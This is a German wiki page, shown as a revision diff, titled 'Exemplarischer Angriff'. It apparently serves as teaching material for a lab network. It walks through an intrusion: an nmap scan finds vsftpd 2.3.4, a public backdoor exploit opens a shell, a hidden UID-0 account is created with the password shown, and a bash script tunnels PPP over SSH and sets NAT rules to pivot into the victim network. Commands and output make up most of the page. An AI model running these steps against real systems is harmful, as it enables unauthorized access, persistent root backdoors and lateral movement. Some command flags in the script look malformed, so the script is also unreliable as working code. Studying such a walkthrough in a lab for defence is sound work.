Exemplarischer Angriff: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 31: | Zeile 31: | ||
=Angreifer= | =Angreifer= | ||
==vpn-gateway== | ==vpn-gateway== | ||
| − | */ | + | *./bin/vpn-hack |
<syntaxhighlight lang="bash"> | <syntaxhighlight lang="bash"> | ||
#!/bin/bash | #!/bin/bash | ||
| − | + | REMOTE_IP="$1" | |
| − | REMOTE_IP=" | ||
| − | |||
| − | |||
| − | |||
LOCAL_NET=10.86.0.0/16 | LOCAL_NET=10.86.0.0/16 | ||
| − | REMOTE_NET=$ | + | REMOTE_NET="$2" |
######## | ######## | ||
PATH=/usr/local/sbin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/bin/X11/: | PATH=/usr/local/sbin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/bin/X11/: | ||
| − | ADD_SNAT=" | + | ADD_SNAT="iptables -t nat -A POSTROUTING -s 172.29.29.2 -j MASQUERADE -o eth0" |
| − | FLUSH_SNAT=" | + | FLUSH_SNAT="iptables -t nat -F" |
| − | + | echo "Starting vpn to localhost -p 9922: " | |
| − | + | pppd updetach noauth passive pty "ssh -P ${REMOTE_IP} -p 22 -o Batchmode=yes pppd nodetach notty noauth" ipparam vpn 172.29.29.2:172.29.29.1 | |
| − | + | route add -net ${REMOTE_NET} gw 172.29.29.1 | |
| − | echo "Starting vpn to localhost -p 9922: " | + | ssh -P localhost -p 9922 ${FLUSH_SNAT} |
| − | pppd updetach noauth passive pty "ssh -P | + | ssh -P localhost -p 9922 ${ADD_SNAT} |
| − | |||
| − | route add -net ${REMOTE_NET} gw 172.29.29.1 | ||
| − | ssh -P localhost -p 9922 ${FLUSH_SNAT} | ||
| − | ssh -P localhost -p 9922 ${ADD_SNAT} | ||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
</syntaxhighlight> | </syntaxhighlight> | ||
Version vom 7. Oktober 2021, 15:23 Uhr
Angreifer
Scan
- nmap -sV 10.80.100.105 -p 21
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-07 16:56 CEST Nmap scan report for 10.80.100.105 Host is up (0.00056s latency).
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 Service Info: OS: Unix
Nach Exploit googlen
- vsftpd 2.3 4 exploit-db
Exploit finden
Exploit ausführen
- python vsftp.py 10.80.100.105
Success, shell opened Send `exit` to quit shell
Opfer
Läuft ssh?
- netstat -lntp | grep 22
tcp6 0 0 :::22 :::* LISTEN 4360/sshd
User anlegen
- useradd -m -o -u 0 -s /bin/bash -d /var/www www
- passwd www
Enter new UNIX password: www2www Retype new UNIX password: www2www passwd: password updated successfully
VPN einrichten um Zugriff zum Netz zu erlangen
- apt-get install ppp
Angreifer
vpn-gateway
- ./bin/vpn-hack
#!/bin/bash
REMOTE_IP="$1"
LOCAL_NET=10.86.0.0/16
REMOTE_NET="$2"
########
PATH=/usr/local/sbin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/bin/X11/:
ADD_SNAT="iptables -t nat -A POSTROUTING -s 172.29.29.2 -j MASQUERADE -o eth0"
FLUSH_SNAT="iptables -t nat -F"
echo "Starting vpn to localhost -p 9922: "
pppd updetach noauth passive pty "ssh -P ${REMOTE_IP} -p 22 -o Batchmode=yes pppd nodetach notty noauth" ipparam vpn 172.29.29.2:172.29.29.1
route add -net ${REMOTE_NET} gw 172.29.29.1
ssh -P localhost -p 9922 ${FLUSH_SNAT}
ssh -P localhost -p 9922 ${ADD_SNAT}